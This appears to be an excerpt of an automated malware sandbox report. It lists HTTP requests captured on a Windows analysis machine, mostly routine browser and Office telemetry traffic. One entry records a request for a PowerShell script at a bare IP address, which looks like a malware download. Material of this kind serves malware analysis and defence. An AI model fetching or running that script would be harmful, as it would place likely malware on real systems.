Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1Host: fonts.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"Origin: https://accounts.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /bloomfilterfiles/ExpandedDomainsFilterGlobal.json HTTP/1.1Host: www.bing.comConnection: keep-aliveCookie: ANON=; MUID=;_RwBf=;Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733023421&P2=404&P3=2&P4=MOstqjPqe8Eg1pa09kOgFyzsQIDiF0edEJhwdiH6oXw7Qn52DMAEA72yi%2fgPPG133ySstQIi9qC%2fMMv4YYyhQg%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: mGcA7tkQen3O51BMaUmxWCSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /v4/api/selection?placement=88000360&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=en-GB&country=CH&edgeid=6686581979505309747&ACHANNEL=4&ABUILD=117.0.5938.132&poptin=0&devosver=10.0.19045.2006&clr=esdk&UITHEME=light&EPCON=0&AMAJOR=117&AMINOR=0&ABLD=5938&APATCH=132 HTTP/1.1Host: arc.msn.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1603893037&timestamp=1732418630684 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ProductCategoriesSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /files/5124158732/KQGBYWk.ps1 HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
